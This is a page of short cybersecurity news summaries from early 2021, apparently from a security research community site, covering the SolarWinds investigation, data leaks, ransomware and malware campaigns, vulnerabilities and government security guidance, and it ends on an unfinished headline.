News Items

  • news

    Visible to the public "SolarWinds Hack Investigation Reveals New Sunspot Malware"

    Crowdstrike researchers have revealed a new strain of malware called Sunspot. This new malware is said to have been used by SolarWinds attackers to inject the Sunburst malicious code into SolarWinds' Orion IT software. Further investigation of the SolarWinds hack has also revealed a new timeline for the event as well as customer support incidents that are believed to be related to the Sunburst malware being used on customer infrastructure. Researchers have found similarities between Sunburst malware and a backdoor linked to the Russian Advanced Persistent Threat (APT) group Turla. According to Crowdstrike researchers, Sunspot was used to monitor running processes in SolarWinds' build environment. The researchers also released details about the tactics, techniques, and procedures (TTPs) used by the attackers to maintain the malware's persistence, ensure that code tampering does not cause build errors, and to prevent SolarWinds' detection of their operations. Sudhakar Ramakrishna, SolarWinds' new CEO, confirmed that the attackers conducted a test run in late 2019 to ensure that the company would not detect their future actions. An analysis of the Sunburst malware revealed that its code is similar to that of Kazuar, a .NET backdoor linked to the Turla APT group. The two malware strains both use the same algorithm to calculate the amount of time that the malware is inactive until it makes a new command-and-control (C&C) server connection. They also use the same algorithms for string obfuscation and the generation of unique victim identifiers. This article continues to discuss the new Sunspot malware, similarities between Kazuar and Sunburst, and other new findings surrounding the SolarWinds hack.

    Help Net Security reports "SolarWinds Hack Investigation Reveals New Sunspot Malware"

  • news

    Visible to the public "Millions of Social Profiles Leaked by Chinese Data-Scrapers"

    Researchers at Safety Detectives discovered a misconfigured ElasticSearch database owned by Chinese social-media management company SocialArks, which exposed 318 million records from Facebook, Instagram, and LinkedIn. The records included 400GB of public and private profile data for 214 million social media users worldwide. The research team determined that the leaked data's entirety was 'scraped' from social-media platforms, which is both unethical and a violation of Facebook's, Instagram's, and LinkedIn's terms of service. The scraped profiles included 11,651,162 Instagram user profiles; 66,117,839 LinkedIn user profiles; 81,551,567 Facebook user profiles; and 55,300,000 Facebook profiles that were deleted within a few hours after the open server was discovered. The public profile data included in the misconfigured database includes biographies, profile pictures, follower totals, location settings, contact details such as email addresses and phone numbers, number of followers, number of comments, frequently used hashtags, company names, employment position, and more. Most data scraping is carried out legally by web developers, business intelligence analysts, and other businesses, but without adequate cybersecurity, then large data leaks affecting millions of people can occur.

    Threatpost reports: "Millions of Social Profiles Leaked by Chinese Data-Scrapers"

  • news

    Visible to the public "Why Older Adults Use (And Do Not Use) Password Managers"

    A team of researchers from the George Washington University and the University of Maryland, Baltimore County, conducted a study in which they explored what motivates or prevents the adoption of password managers among older adults over the age of 60. The team interviewed participating older adults in three groups: those who use built-in password managers provided by browsers or operating systems, those who use separately installed password managers, and those who do not use password managers. Findings of the study revealed that security concerns outweighed the perceived benefits of using password managers. Those who use password managers expressed satisfaction with their experiences as they feel confident in using features such as the password generator and auto-fill. Older adults who do not use a password manager still think that their current method of storing passwords, like writing them down, is safe and easy. All three groups agreed that financial accounts were the most important to secure as any attack on them could result in significant damage. The researchers also found that older adults who did adopt a password manager had a more positive experience than younger adults. This article continues to discuss the findings from the study on why older adults use or do not use password managers and how these findings differ from that of the study on younger adults' password manager use.

    The George Washington University reports "Why Older Adults Use (And Do Not Use) Password Managers"

  • news

    Visible to the public "How 5G and AI Are Creating an Architectural Revolution"

    The Intel Federal CTO Steve Orrin and the Dell Federal CTO Cameron Chehreh have discussed the bottom-up transformation of IT by the fifth generation of wireless technology 5G and how this revolution will impact security. 5G will enhance the digitization of everyday life as it offers higher bandwidth, increased capacity, lower latency, and more. This next generation of mobile internet connectivity will help improve the delivery of content-rich services such as 4K video and immersive augmented reality to smart devices. 5G can also make Machine-to-Machine (M2M) communications possible for enterprises. The transformation of raw data into real-time insights by applications leveraging Artificial Intelligence (AI) and Machine Learning (ML) will also be underpinned by 5G. It is essential to explore how 5G's dynamic, software-defined architecture can be secured. 5G security must cover not only data but also AI algorithms. Therefore, 5G-enabled architecture calls for a new security paradigm that takes on a risk-based approach in which the whole data lifecycle is considered. Risk-based security should encompass design, procurement, the supply chain, the development process, and more. This article continues to discuss how 5G is expected to transform IT from the bottom-up, how these changes will affect security, and what approach should be taken to secure 5G-enabled architecture.

    NextGov reports "How 5G and AI Are Creating an Architectural Revolution"

  • news

    Visible to the public "CISA Insights on APT Compromise of Microsoft 365 Via Password Exploits"

    The U.S. Homeland Security Department's Cybersecurity & Infrastructure Security Agency (CISA) issued an alert about the use of compromised Microsoft 365 and Azure applications by the Advanced Persistent Threat (APT) actors behind the SolarWinds supply chain cyberattack to access cloud resources. CISA is investigating incidents in which the threat actors' may have gained initial access into victims' networks using techniques such as password guessing, password spraying, or the exploitation of improperly secured administrative credentials, rather than compromised SolarWinds Orion products. This article continues to discuss the latest alert released by CISA warning of the use of compromised Microsoft 365 and Azure applications by the SolarWinds APT attackers to gain access to cloud resources, as well as how organizations can defend themselves against the latest attacks detailed by Microsoft and CISA.

    HealthITSecurity reports "CISA Insights on APT Compromise of Microsoft 365 Via Password Exploits"

  • news

    Visible to the public "Over 100,000 UN Employee Records Accessed by Researchers"

    Security researchers at Sakura Samuria have revealed that it took them just hours to access over 100,000 personal records and credentials belonging to United Nations Employees. The researchers were looking for bugs to report to the UN under its vulnerability disclosure program. The researchers initially found an exposed subdomain for the UN body, the International Labour Organization (ILO). This gave them access to Git credentials, which they used to take over a legacy MySQL database and a survey management platform. Exfiltration of these credentials was done with the git-dumper tool. These assets contained hardly anything of use, the researchers stated. The researchers also discovered an exposed subdomain related to the United Nations Environment Programme (UNEP), a much bigger privacy risk. This domain was also leaking Git credentials. Once the researchers discovered the GitHub credentials, they were able to download many private password-protected GitHub projects, and within the projects, they found multiple sets of database and application credentials for the UNEP production environment. In total, the team discovered over 100,000 employee records, including names, ID numbers, gender, pay grade, records of travel details, work sub-areas and departments, evaluation reports, and funding source records.

    Infosecurity reports: "Over 100,000 UN Employee Records Accessed by Researchers"

  • news

    Visible to the public "Malware Developers Refresh Their Attack Tools"

    An analysis conducted by the Cisco Talos research team further highlighted the continued advancement in the development of attack tools. The developers of these tools are making it increasingly difficult for defenders to detect and analyze their malware, thus increasing the complexity of infection chains. The researchers analyzed the latest version of the LokiBot malware, which is capable of stealing credentials and other sensitive information. They found that LokiBot's developers added a third stage to its process for compromising systems as well as an added layer of encryption to evade detection. The attack techniques associated with the LokiBot malware campaign also includes hiding code in images and tricking victims into enabling macros on Microsoft Office using social engineering tactics. The growing sophistication of LokiBot and other malware calls on the adoption of a multilayered approach to detecting attacks. This article continues to discuss the continued development of LokiBot malware to prevent analysis and detection, the advancement of other malware strains, and the importance of taking a multilayered approach to addressing the increasing sophistication of attack tools.

    Dark Reading reports "Malware Developers Refresh Their Attack Tools"

  • news

    Visible to the public Anne Neuberger named as Deputy National Security Advisor for Cybersecurity in Biden administration

    Anne Neuberger current director of the Cybersecurity Directorate at NSA has been named by President-Elect Biden to the new position on the National Security Council as deputy national security advisor for cybersecurity. This move demonstrates a commitment to cybersecurity and its importance to national security especially important after the SolarWinds hack.

  • news

    Visible to the public "Emotet Tops Malware Charts in December After Reboot"

    Check Point researchers recently found that the Emotet Trojan bounced back from fifth place on the malware charts in November to now back at the top. The Emotet Trojan accounts for 7% of malware infections globally after a spam campaign targeted more than 100,000 users per day over the holiday period. Emotet is closely followed by fellow modular Trojan Trickbot and info-stealer Formbook (both 4%). The Emotet Trojan has now been updated with new malicious payloads and improved detection evasion capabilities. The latest version creates a dialogue box, which helps it evade detection from users, the researchers stated. The new malicious spam campaign uses different delivery techniques to spread Emotet, including embedded links, document attachments, or password-protected Zip files. Emotet and Trickbot are often used in combination by ransomware groups to gain an initial foothold into networks.

    Infosecurity reports: "Emotet Tops Malware Charts in December After Reboot"

  • news

    Visible to the public "FBI Warns of Egregor Attacks on Businesses Worldwide"

    The FBI is warning companies in the private sector of an increase of attacks using the Egregor ransomware. The malware has already compromised more than 150 organizations. Egregor is spread through phishing emails with malicious attachments, exploits for remote desktop protocol (RDP), and VPNs. Threat actors can move inside networks laterally once inside. Egregor ransomware affiliates have been observed using tools like Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner, and AdFind to escalate privileges and make lateral moves across a network. They are also using tools like Rclone and 7zip to exfiltrate data, according to the FBI.

    Threatpost reports: "FBI Warns of Egregor Attacks on Businesses Worldwide"

  • news

    Visible to the public "Malspam Campaign Spoofs Email Chains to Install IcedID Info-Stealer"

    The Unit 42 threat research team at Palo Alto Networks shared details about a new phishing campaign operated by the cybercriminal group TA551, also known as Shathak. TA551 is well known for its distribution of malware, such as Ursnif, Valak, and IcedID, to steal information. The phishing campaign targets English, German, Italian, and Japanese-speaking victims. It primarily focuses on distributing IcedID via malicious macros. The campaign sends malicious emails with attached, password-protected zip archives containing Word documents. Once the recipient opens the document and enables its malicious macros, the infection chain begins, and the IcedID malware is installed on the victim's system. According to the research team, TA551 malspam spoofs legitimate email chains using genuine messages gathered from email clients on previously infected Windows hosts. This article continues to discuss recent findings surrounding the new TA551 malspam campaign that spoofs email chains to distribute IcedID malware and other observed changes in the cybercriminal group's traffic patterns and infections.

    SC Media reports "Malspam Campaign Spoofs Email Chains to Install IcedID Info-Stealer"

  • news

    Visible to the public "Credit Card Data of 10,000 American Express Accounts Posted on Darknet Forum for Free"

    The threat intelligence analyst Bank Security has brought attention to the leakage of data belonging to over 10,000 American Express Mexico-based credit cardholders by a threat actor on an underground hacking forum. The same threat actor also claimed to have data of Mexican banking customers of Santander and Banamex. According to Bank Security, the leaked data contains credit card numbers, names, phone numbers, full addresses, birth dates, membership reward details, and other personally identifiable information (PII). American Express released a statement, saying that its card members will not be held liable for any fraudulent charges on their accounts. The card company also stated that sophisticated monitoring systems and internal safeguards have been implemented to detect fraudulent and suspicious activities. The leaked data could be used in the performance of phishing attacks and tele-calling scams. This article continues to discuss the leaked sample data set of records that expose sensitive information about Mexico-based American Express credit cardholders, the card company's response to this discovery, the malicious activities that could be performed using this data, and how American Express cardholders can protect themselves.

    CISO MAG reports "Credit Card Data of 10,000 American Express Accounts Posted on Darknet Forum for Free"

  • news

    Visible to the public "Vulnerabilities in Fortinet WAF Can Expose Corporate Networks to Attacks"

    Fortinet has released advisories about potentially serious vulnerabilities found in its FortiWeb Web Application Firewall (WAF). According to Andrey Medov, the lead security researcher at Positive Technologies who discovered the vulnerabilities, the exploitation of these flaws could lead to the exposure of corporate networks to attacks. FortiWeb is vulnerable to buffer overflows and a blind SQL injection that could allow threat actors to execute Denial-of-Service (DoS) attacks and unauthorized code or commands. This article continues to discuss the discovery, disclosure, and potential impact of vulnerabilities in the FortiWeb administration interface.

    Security Week reports "Vulnerabilities in Fortinet WAF Can Expose Corporate Networks to Attacks"

  • news

    Visible to the public "Hackers Target Cryptocurrency Users With New ElectroRAT Malware"

    The security firm Intezer Labs discovered a malware operation in which cybercriminals have created fake cryptocurrency apps containing a new malware strain called ElectroRAT, written in the open-source programming language Go. The campaign was found in December 2020 but is believed to have been actively spreading malware since January 8, 2020. According to Intezer Labs, the hackers behind this campaign relies on three cryptocurrency-related apps named Jamm, eTrade/Kintum, and DaoPoker, which are all hosted on their own websites. The first two apps claim to allow users to trade cryptocurrency, while the third app is gambling-based. ElectroRAT aims to drain cryptocurrency wallets on Windows, Linux, and Mac operating systems. This malware is said to be significantly intrusive in that it is capable of keystroke logging, taking screenshots, downloading files, executing commands, and more, on a victim's console. Intezer Labs suspects that this malware operation has infected at least 6,500 users. This article continues to discuss the discovery, distribution, and capabilities of the ElectroRAT malware targeting cryptocurrency users, as well as the growing popularity of the Go programming language among malware authors.

    ZDNet reports "Hackers Target Cryptocurrency Users With New ElectroRAT Malware"

  • news

    Visible to the public "PayPal Users Targeted in New SMS Phishing Campaign"

    A new SMS-based phishing campaign is going around that attempts to steal PayPal user's account credentials and other sensitive information, according to researchers BleepingComputer. The SMS text message impersonates the popular payment processor and informs potential victims that their accounts have been "permanently limited" and that they need to click on the link to verify their identity. At first glance, the message may not seem very suspicious because PayPal does impose limits if it suspects that a third party without authorization has accessed an account, when it has detected high-risk activities on an account, or when a user has violated its Acceptable Use Policy. If a victim clicks on the link, they are redirected to a login phishing page to request their access credentials. Should the victim proceed to "log in," then their credentials will be sent to the scammers behind the ruse, and the fraudulent webpage will attempt to gather further information, including the victim's full name, date of birth, address, and bank details. PayPal is one of the most-spoofed brands in phishing scams.

    WeLiveSecurity: "PayPal Users Targeted in New SMS Phishing Campaign"

  • news

    Visible to the public "Google Warns of Critical Android Remote Code Execution Bug"

    Google's Android security update was recently released and addressed 43 bugs overall affecting Android handsets, including Samsung phones. One critical-severity flaw fixed with this security update was CVE-2021-0316. This flaw was a remote-code-execution flaw in Google's Android System component, which is the core of the Android operation system. This particular flaw could allow an adversary using a specially crafted transmission to execute arbitrary code within the context of a privileged process, according to Google. Another critical severity flaw fixed by this update is (CVE-2021-0313). This flaw was a denial-of-service issue in the Android Framework component, a set of APIs that allow developers to quickly and easily write apps for Android phones. Both critical flaws are fixed in Android versions 8.0, 8.1, 9, 10, and 11. The article continues to discuss the other bugs that the new security update fixed.

    Threatpost reports: "Google Warns of Critical Android Remote Code Execution Bug"

  • news

    Visible to the public Pub Crawl #45

    Pub_Crawl_web.jpgPub Crawl summarizes, by hard problems, sets of publications that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are chosen for their usefulness for current researchers.

  • news

    Visible to the public "NSA Releases Guidance on Obsolete Encryption Tools"

    The National Security Agency (NSA) released guidance for the Department of Defense, other U.S. federal government agencies, and supporting contractors on the replacement of obsolete Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols used to encrypt network traffic traversing between servers. The use of deprecated forms of TLS or SSL for traffic sessions leave networks vulnerable to decryption and sensitive data exposure. NSA recommends that organizations only use TLS 1.2 or TLS 1.3 versions of the protocol. Organizations are also encouraged to avoid using SSL 2.0, SSL 3.0, TLS 1.0, and TLS 1.1 versions since they are now outdated. The guidance provided by NSA also covers detection strategies that network security analysts can apply to identify the use of obsolete TLS protocols, cipher suites, and more. This article continues to discuss NSA's recommendations concerning the replacement of old TLS and SSL protocols, in addition to past discoveries surrounding threat actors' methods to circumventing TLS encryption or weaponizing the protocol.

    BankInfoSecurity "NSA Releases Guidance on Obsolete Encryption Tools"

  • news

    Visible to the public CISE announces collaboration of joint proposals to NSF and Academy of Finland

    CISE has announced a collaboration program for joint proposals to NSF and the Academy of Finland. See Proposals may be submitted to CISE Core programs, specifically in the areas of artificial intelligence and/or wireless communication technologies.

    Please note: SaTC is NOT participating in this program.

  • news

    Visible to the public SoS Musings #44 - Industrial Robots and Cybersecurity

    SoS Musings #44 -

    Industrial Robots and Cybersecurity

  • news

    Visible to the public Cyber Scene #51 - The Viral Cyber Pandemic

    Cyber Scene #51 -

    The Viral Cyber Pandemic

  • news

    Visible to the public Challenges for Digital Proximity Detection in Pandemics: Privacy, Accuracy, and Impact

    NIST is holding a virtual workshop on Challenges for Digital Proximity Detection in Pandemics: Privacy, Accuracy, and Impact, during January 26, 2021 - January 28, 2021, 10:00am - 3:30pm EST.

    To learn more and register, visit:

  • news

    Visible to the public Cybersecurity Snapshots #13 - Are IoT Devices Secure?

    Cybersecurity Snapshots #13 -

    Are IoT Devices Secure?

  • news

    Visible to the public Spotlight on Lablet Research #13 - Multi-Model Testbed for the Simulation-Based Evaluation of Resilience

    Spotlight on Lablet Research #13 -

    Project: Multi-Model Testbed for the Simulation-Based Evaluation of Resilience

  • news

    Visible to the public "US Investigators Say SolarWinds Hack is ‘Likely Russian in Origin’"

    After an intensive investigation, U.S. government agencies have concluded that the espionage operation that uses tampered software made by SolarWinds was most likely Russian in origin. The investigators also indicated that the espionage operation was targeted. The malicious software update went to some 18,000 government and private-sector customers. The FBI stated that fewer than 10 U.S. government agencies had been comprised by follow-on activity on their systems. Russia has denied involvement in the SolarWinds hacking operation. The adversaries behind the SolarWinds campaign have challenged the defenses of America's biggest tech and cybersecurity firms. The attackers were able to view Microsoft's source code, and they stole the security tools that FireEye uses to test its clients' defenses.

    Cyberscoop reports: "US Investigators Say SolarWinds Hack is 'Likely Russian in Origin'"

  • news

    Visible to the public "Ransomware Surge Drives 45% Increase in Healthcare Cyberattacks"

    According to the security vendor Check Point, Global Healthcare Organizations (HCOs) have been targeted in cyberattacks significantly more than other sectors from the beginning of November to the end of 2020. There was a 45% increase in cyberattacks against the healthcare sector. The attack volume was more significant in November, with HCOs experiencing more than 600 weekly attacks on average per organization. HCOs suffered a variety of attacks, including ransomware, botnets, remote code execution, and Distributed Denial-of-Service (DDoS). However, ransomware displayed the largest increase, posing a greater threat to HCOs. Ryuk and Sodinokibi (REvil) were cited as the most prolific ransomware families. Check Point also revealed that Central Europe experienced the highest increase in cyberattacks on HCOs, followed by East Asia and Latin America. This article continues to discuss findings shared by Check Point on the increase in healthcare cyberattacks regarding common attack types, targets, and tactics, in addition to what organizations can do to prevent these attacks.

    Infosecurity Magazine reports "Ransomware Surge Drives 45% Increase in Healthcare Cyberattacks"

  • news

    Visible to the public "Ransomware Gang Collects Data from Blood Testing Lab"

    Apex Laboratory has just disclosed that on July 25th, adversaries hit them with a ransomware attack. Apex Laboratory provides blood work at home for patients in New York City, Long Island, and South Florida. The forensic investigation ended on December 15th and determined that the attackers had gained access to patient data and had posted information on their blog about the attack. According to Apex, the data the adversaries obtained include patient names, dates of birth, test results, and for some individuals, Social Security numbers, and phone numbers. The information was likely taken from Apex's systems between July 21 and July 25 as part of a "double extortion" attack where criminals lock-up systems and exfiltrate data.

    Threatpost reports: "Ransomware Gang Collects Data from Blood Testing Lab"

  • news

    Visible to the public "Researchers Fool reCAPTCHA With Google's Own Speech-To-Text Service"

    CAPTCHA is a security system widely used on the internet to protect websites against automated bots by generating image, audio, or text challenges. These challenges help distinguish human input from machine input. Researchers have attempted to break this system using reverse-image searchers, deep learning, and experimental neuroscience. Now, researchers at the University of Maryland (UMD) have developed a CAPTCHA-fooling method called unCAPTCHA, which is claimed to be capable of fooling Google's reCAPTCHA, one of the most popular systems used by thousands of websites, with a significantly high success rate. The researchers' unCAPTCHA method uses Google's free speech-to-text service against Google's own CAPTCHA system. This article continues to discuss the concept of the CAPTCHA system, the unCAPTCHA method developed by UMD researchers to break Google's reCAPTCHA, and Google's response to this new hack.

    Motherboard reports "Researchers Fool reCAPTCHA With Google's Own Speech-To-Text Service"

  • news

    Visible to the public "Leading Game Publishers Hit Hard by Leaked-Credential Epidemic"

    Researchers at Kela have found stolen credentials tied to the top 25 gaming firms, such as Ubisoft. In a recent scan, the researchers found 1 million compromised credentials associated with the larger gaming universe of "clients" and employees. The researchers found the credentials on caches of breached data online and up for sale at criminal marketplaces. The gaming industry is a $196 billion industry, and the growing success of this industry has called attention from cybercriminals scouting for new targets. The researchers stated that the gaming industry might not prioritize their security precautions. In 2020 gamers have faced foul play, usually ranging from ID theft, scams, or the hack of in-game valuables.

    Threatpost reports: "Leading Game Publishers Hit Hard by Leaked-Credential Epidemic"

  • news

    Visible to the public "Microsoft Says SolarWinds Hackers Accessed Company Source Code"

    Microsoft recently revealed that the hackers behind the SolarWinds Orion software supply chain attack were able to access company source code. The detection and review of unusual activity with some internal accounts led to the discovery of one account that had been used to look at source code in several source code repositories. Further investigation confirmed that the account did not make any changes as it did not have permission to modify code or engineering systems. This article continues to discuss initial reports and new discoveries surrounding the impact of the SolarWinds supply chain attack on Microsoft, in addition to Microsoft's approach to source code.

    CyberScoop reports "Microsoft Says SolarWinds Hackers Accessed Company Source Code"

  • news

    Visible to the public "This Top VPN Has an Unfortunate Backdoor Security Flaw"

    Researchers at the Dutch cybersecurity firm called Eye Control recently discovered a backdoor security flaw impacting about 100,000 Zyxel devices. Impacted Zyxel products include Advanced Threat Protection devices, VPN gateways, and the firm's NXC series of devices. The researchers found a secret backdoor account that can grant attackers root access to users of Zyxel's VPN services, in addition to firewalls and Access Point (AP) controllers managed by the company. This backdoor was introduced in a recent firmware update for different Zyxel firewalls and AP controllers. According to the researchers, the backdoor account uses a username and password visible as plain text in Zyxel system binaries running firmware ZLD V4.60. These credentials work on both the SSH and web interface access portal. This article continues to discuss the admin-level backdoor discovered in Zyxel security products.

    TechRadar reports "This Top VPN Has an Unfortunate Backdoor Security Flaw"

  • news

    Visible to the public "T-Mobile Faces Yet Another Data Breach"

    T-mobile USA has reported a data breach that occurred last week via its website, its fourth data breach in three years. The data that was accessed by the adversary is customer proprietary network information (CPNI). CPNI is some of the most sensitive personal information that carriers and providers have about their customers, stated the Federal Communications Commission. CPNI includes records of which phone numbers users called; the frequency, duration, and timing of such calls; and any services purchased by the consumer. The adversary did not gain access to data that included names on the account, physical or email addresses, financial data, credit card information, Social Security numbers, tax ID, passwords, or PINs. T-Mobile stated that 0.2 percent of customers (around 200,000 people) were affected by the breach. The article continues to discuss the other three data breaches that T-mobile USA had suffered in the past.

    Threatpost reports: "T-Mobile Faces Yet Another Data Breach"

  • news

    Visible to the public Worst Hacks of 2020

    Start 2021 with a review of the worst Hacks of 2020. From SolarWinds Supply Chain Hack to a takeover of high profile accounts on Twitter, it was a year of cybersecurity challenges.

  • news

    Visible to the public "Government Security Experts Issue Farmers with New Advice"

    The UK's National Cyber Security Centre (NCSC) issued cybersecurity guidance for farmers as cyberthreats facing rural businesses continue to grow. The comprehensive guide, titled "Cybersecurity for Farmers," outlines best practices for recognizing suspicious emails, managing passwords, securing devices, backing up data, and more. The increased use of automated machinery, smart security cameras, and software for back-office management and productivity prompted the development of this guide as such technologies have made the agriculture sector more attractive to cybercriminals. Cyberattacks on agricultural businesses can lead to the exposure of confidential data as well as significant financial losses. Stuart Roberts, the National Farmers Union deputy president, emphasized farmers' increased reliance on technologies and cybercriminals' growing sophistication in the exploitation of vulnerabilities contained by those technologies to steal money, data, and passwords. Suggestions for farmers include regularly patching software, replacing end-of-life (EOL) operating systems, applying encryption tools, and using firewalls. This article continues to discuss the importance and contents of NCSC's first-ever farmer-oriented guidance for cybersecurity.

    Infosecurity Magazine reports "Government Security Experts Issue Farmers with New Advice"

  • news

    Visible to the public "Whirlpool Hit With Ransomware Attack"

    The major appliances giant Whirlpool acknowledges it was hit with a ransomware attack in November. Whirlpool stated that they were unaware of any consumer information being exposed because of the attack and that the ransomware is not causing any operational difficulties at this time. The cyber gang behind the ransomware attack was the Nefilim group. Emsisoft Threat analysts discovered that the cyber gang had posted two files to its wall-of-shame news site with information it claims is from Whirlpool. The Nefilim group is best known for going after organizations that use unpatched or poorly secured Citrix remote-access technology, then stealing data, unleashing crypto-locking malware, and using the threat of exfiltrated data being publicly dumped to try to force payment. In June, New Zeland's Cert stated that organizations hit with a typical Nefilim attack would see files with a .NEFILIM extension, a file called NEFILIM-DECRYPT.txt may be placed on affected systems, and batch files created in C:WindowsTemp.

    Data Breach Today reports: "Whirlpool Hit With Ransomware Attack"

  • news

    Visible to the public "Worldwide VPN Market to Reach $75.59 Billion by 2027"

    Researchers have found that the global VPN market was valued at $25.41 billion in 2019 and is projected to reach $75.59 billion by 2027, growing at a compound annual growth rate of 14.7% from 2020 to 2027. The major factors driving the VPN market's growth include the increase in data security concerns, the rise in advanced & complex cyber threats, and an upsurge in usage of mobile and wireless devices within organizations. North America is expected to hold the largest VPN market share, followed by the European market in 2027. The Asia Pacific market is projected to register the highest compound annual growth rate for the forecasted period.

    Help Net Security reports: "Worldwide VPN Market to Reach $75.59 Billion by 2027"

  • news

    Visible to the public "Data Breach Broker Selling User Records Stolen From 26 Companies"

    BleepingComputer has discovered that a data breach broker is selling more than 360 million user records allegedly stolen from 26 companies on a hacker forum. Threat actors and hacking groups commonly work with data breach brokers to market and sell the data they steal from companies' user databases. Of the 26 affected companies, eight of them are new alleged data breaches that have not been disclosed previously. These companies include Teespring, SitePoint, Wahoo Fitness, Chqbook, AnyVan, Eventials, ClickIndia, and myON. This article continues to discuss the discovery of user records stolen from 26 companies being sold by a data breach broker on a hacker forum, responses from impacted companies, and what potentially affected users should do to protect themselves.

    BleepingComputer reports "Data Breach Broker Selling User Records Stolen From 26 Companies"

  • news

    Visible to the public "New Golang Worm Turns Windows and Linux Servers Into Monero Miners"

    Researchers from Intezer released details about a new Golang-based worm that drops XMRig cryptocurrency miners on Windows and Linux servers. According to the researchers, the worm targets MySQL, Jenkins, Tomcat, WebLogic, and other public-facing services with weak passwords. The attackers behind this campaign have been actively updating the worm on its command-and-control (C2) server, indicating its continued maintenance. The worm is expected to hit more weak configured services in future updates. Security teams are advised to increase the complexity of passwords, limit login attempts, and enable two-factor authentication. Intezer researchers also urge security teams to minimize the use of public-facing services, keep software up to date, and use a cloud workload protection platform. This article continues to discuss the spread, capabilities, potential large-scale impact, and prevention of the new Golang worm.

    SC Media reports "New Golang Worm Turns Windows and Linux Servers Into Monero Miners"

  • news

    Visible to the public "DDoS Attacks Spiked, Became More Complex in 2020"

    There has been a significant increase in Distributed Denial-of-Service (DDoS) attacks as a result of the large-scale shift to remote work among organizations and the increased use of online services during the COVID-19 pandemic. DDoS mitigation service providers have reported an increase in attack volumes, sophistication, and complexity in 2020. Trends surrounding DDoS in 2020 observed by security experts include the surge in DDoS attacks stemming from the global pandemic, the increase in the number of extortion DDoS attacks, the growth in multivector attacks, the increase in the size of DDoS attacks, and the broadening of attackers' range of targets. This article continues to discuss major DDoS trends seen by security experts in 2020 regarding the increase in number, size, and complexity of DDoS attacks.

    Dark Reading reports "DDoS Attacks Spiked, Became More Complex in 2020"

  • news

    Visible to the public "Hackers Threaten to Leak Plastic Surgery Pictures"

    The ransomware gang known as REvil has stolen data from the Transform Hospital Group, which is the UK's leading specialist weight loss and cosmetic surgery group. REvil claims to be in possession of patients' before and after photos. The group also claims to have obtained more than 900 gigabytes of these patient photographs. They are threatening to publish the photos. A statement released by the Transform Hospital Group confirms that no payment card details belonging to patients were compromised in the breach of its IT systems. However, some personal data, in addition to the photographs, may have been accessed by the hackers. Travelex and the entertainment law firm Grubman Shire Meiselas & Sacks have also fallen victim to REvil, also known as Sodinokibi. This article continues to discuss the ransomware attack faced by the Transform Hospital Group, the group's threats to publish patients' photographs, and recent changes in tactics used by ransomware gangs to pressure victims into paying the demanded ransoms.

    BBC reports "Hackers Threaten to Leak Plastic Surgery Pictures"

  • news

    Visible to the public "NIST Shares Best Practice Security Guidance for Vulnerable PACS"

    The National Institute of Standards (NIST) released cybersecurity guidance for the Picture Archiving Communication System (PACS), which manages medical images. PACS enables the acceptance, transfer, display, storage, and digital processing of medical images. PACS servers are widely used in healthcare delivery organizations. However, reports have revealed that the vulnerabilities contained by PACS have led to the exposure of millions of medical images. One of the vulnerabilities includes the use of the DICOM protocol, which has flaws that could allow attackers to hide malware in medical images and infect patient data. NIST Special Publication (SP) 1800-24 addresses these security risks and provides guidance to help healthcare providers organizations strengthen the security of their PACS and DICOM technologies and prevent patient data exposure. The NIST guide was built through a risk assessment of PACS based on NIST standards. NIST's National Cybersecurity Center of Excellence (NCCoE) also developed an example implementation that demonstrates how healthcare entities can use standards-based, commercially available technologies to bolster the PACS ecosystem's security. This article continues to discuss the cybersecurity guidance released by NIST for PACS, the flaws in this technology, and how securing PACS presents challenges.

    HealthITSecurity reports "NIST Shares Best Practice Security Guidance for Vulnerable PACS"

  • news

    Visible to the public "6 Questions Attackers Ask Before Choosing an Asset to Exploit"

    According to David "moose" Wolpoff, co-founder and CTO at Randori, he believes that understanding the hacker's logic is important. If hacker logic is applied in an enterprise, then the enterprise's security strategy will shift, leading to more efficiencies and lower risk. The attacker's perspective on how an attacker evaluates assets to go after and exploit on an attack surface begins by answering six questions; What useful information can I see about a target from the outside?; How valuable is this asset to the adversary?; Is the asset known to be exploitable?; How hospitable will this asset be if I pwn it?; How long will it take to develop an exploit?; Is there repeatable ROI developing an exploit? The article continues to answer these six questions in detail and stresses the importance for security teams to think more like an attacker.

    Threatpost reports: "6 Questions Attackers Ask Before Choosing an Asset to Exploit"

  • news

    Visible to the public "FBI: Home Surveillance Devices Hacked to Record Swatting Attacks"

    The FBI has issued an alert on Tuesday that swatters have been hijacking home surveillance and other types of devices with audio and video capabilities to watch their victims while they are being swatted. In some cases, the prankster also live-streams the video and engage with the law enforcement responders. Swatting is a hoax where someone tricks emergency services into deploying armed law enforcement to a targeted individual's location by claiming there is a life-threatening situation. Smart home device manufacturers recently notified law enforcement that offenders have been using stolen e-mail passwords to access smart devices with cameras and voice capabilities to carry out the swatting attacks. The FBI has been working with the manufacturers of the targeted devices to warn customers about the threat and provide them with recommendations on how to avoid having their devices hacked.

    SecurityWeek reports: "FBI: Home Surveillance Devices Hacked to Record Swatting Attacks"

  • news

    Visible to the public "Fresh Card Skimmer Attacks Multiple E-Commerce Platforms"

    Researchers with the Dutch security firm Sansec recently discovered a payment card skimmer targeting multiple content management systems that support many e-commerce sites' online checkout pages. According to a report released by the researchers, the new skimmer was found on a dozen online stores' checkout pages supported by content management systems hosted on platforms from Shopify, BigCommerce, Zen Cart, and WooCommerce. It remains unclear as to whether this payment card-skimming malware is tied to a specific Magecart group. Magegroup refers to several separate hacking groups aimed at stealing credit card numbers and other sensitive data through the performance of web-based card-skimming attacks. The report highlights that the skimmer is unusual because it can target multiple content management systems simultaneously instead of individually. This article continues to discuss current findings surrounding how the new payment card skimmer works, as well as other new techniques that fraudsters have been using to hide malicious JavaScript skimmers within e-commerce checkout sites.

    GovInfoSecurity "Fresh Card Skimmer Attacks Multiple E-Commerce Platforms"

  • news

    Visible to the public "Finnish Lawmakers' Emails Hacked in Suspected Espionage Incident"

